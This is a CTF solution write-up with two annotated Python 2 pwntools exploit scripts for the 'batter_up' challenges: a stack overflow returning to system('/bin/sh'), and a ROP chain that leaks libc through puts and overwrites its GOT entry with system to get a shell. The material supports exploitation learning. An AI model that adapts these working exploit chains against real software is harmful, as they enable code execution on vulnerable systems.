
BTH_CTF 2019


batter_up

from pwn import *

# Proof-of-concept for the "batter_up" challenge: a plain stack overflow that
# returns into system@plt with a fixed argument. The `print p.recv()`
# statement and the str-typed payload mark this as Python 2 pwntools; under
# Python 3 the `"" + p32(...)` concatenations would raise TypeError.
p = process("./batter_up")
elf = ELF("./batter_up")

# Address of system@plt read from the binary's PLT. Using it as a fixed value
# only works because the binary is loaded at a fixed address (non-PIE);
# with PIE it would have to be leaked first.
system = elf.plt['system']
# Hard-coded pointer to a "/bin/sh" string -- presumably inside the binary
# itself, since the script never searches for it; verify against the
# challenge binary before reuse.
binsh = 0x804874a
print p.recv()

# Overflow layout: 48 bytes of filler (presumably the buffer plus the saved
# frame pointer, up to the saved return address), then a fake call frame for
# system(): the saved return address becomes system@plt, "DDDD" fills the
# return-address slot of that fake frame (never used), and the next word is
# system's single argument.
# Mitigation note: a stack canary or PIE would each defeat this chain, since
# it relies on overwriting the return address and on fixed addresses.
payload = ""
payload += "A"*48
payload += p32(system)
payload += "DDDD"
payload += p32(binsh)

p.sendline(payload)

p.interactive()

batter_up 3

from pwn import *

# Proof-of-concept for "batter_up_3": the same overflow, but without a usable
# system@plt, so the chain leaks a libc address through puts, writes a string
# into .bss with gets, and then redirects the puts GOT entry. Python 2
# pwntools is implied by the str-typed payload (p32() returns str there).
p = process("./batter_up_3")
elf = ELF("./batter_up_3")
# Libc shipped with the challenge. It is loaded but never queried: the
# puts->system distance below is hard-coded instead of read from `lib`.
lib = ELF("./libc_e3d54f5709190f15a9c51089c70f2069771913c1.so.6")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets = elf.plt['gets']
bss = elf.bss()
# Gadget addresses, hard-coded (so the binary is assumed non-PIE). Going by
# the names: pr = one pop; ret, ppr = two pops; ret, pppr = three pops; ret.
# Only `pr` is used below; ppr/pppr are dead assignments.
pr = 0x080483d1
ppr = 0x0804870a
pppr = 0x08048709

p.recv()

# ROP chain: 44 bytes of filler, then a sequence of call frames. Each frame is
# laid out as [function][pop;ret gadget][argument]; after the function returns
# the gadget pops the argument off the stack so execution continues with the
# next frame.
# Mitigation note: a stack canary, PIE (fixed gadget addresses) or Full RELRO
# (read-only GOT, blocks step 4) would each break this chain.
payload = ""
payload += "A"*44
# 1. puts(puts@got): print the resolved runtime address of puts -- this is the
#    libc leak that defeats libc ASLR.
payload += p32(puts_plt)
payload += p32(pr)
payload += p32(puts_got)

# 2. gets(bss): read the next input line (the "/bin/sh" sent later) into the
#    writable .bss section.
payload += p32(gets)
payload += p32(pr)
payload += p32(bss)

# 3. puts(bss): echo that string back. This script never consumes the output.
payload += p32(puts_plt)
payload += p32(pr)
payload += p32(bss)

# 4. gets(puts@got): overwrite the GOT entry of puts with the next input line.
payload += p32(gets)
payload += p32(pr)
payload += p32(puts_got)

# 5. puts@plt(bss): the PLT stub now jumps through the overwritten GOT entry.
#    "DDDD" is the (unused) return-address slot of this final frame.
payload += p32(puts_plt)
payload += "DDDD"
payload += p32(bss)

p.sendline(payload)

# The first 4 bytes produced by step 1 are the leaked puts address.
# NOTE(review): the log label says "libc_plt", but the value is the libc
# address of puts, not a PLT entry.
libc_puts = u32(p.recv(4))
log.info("libc_plt = {}".format(hex(libc_puts)))
# Fixed puts -> system distance; presumably taken from the libc named above,
# and only valid for that exact build.
libc_system = libc_puts - 0x24f00
log.info("libc_system = {}".format(hex(libc_system)))
# Consumed by step 2's gets().
p.sendline("/bin/sh\x00")

# Consumed by step 4's gets(). NOTE(review): gets() also stores a terminating
# NUL after the 4 bytes, so the byte following the puts entry in the GOT is
# clobbered as well -- the script silently relies on that being harmless.
p.sendline(p32(libc_system))

p.interactive()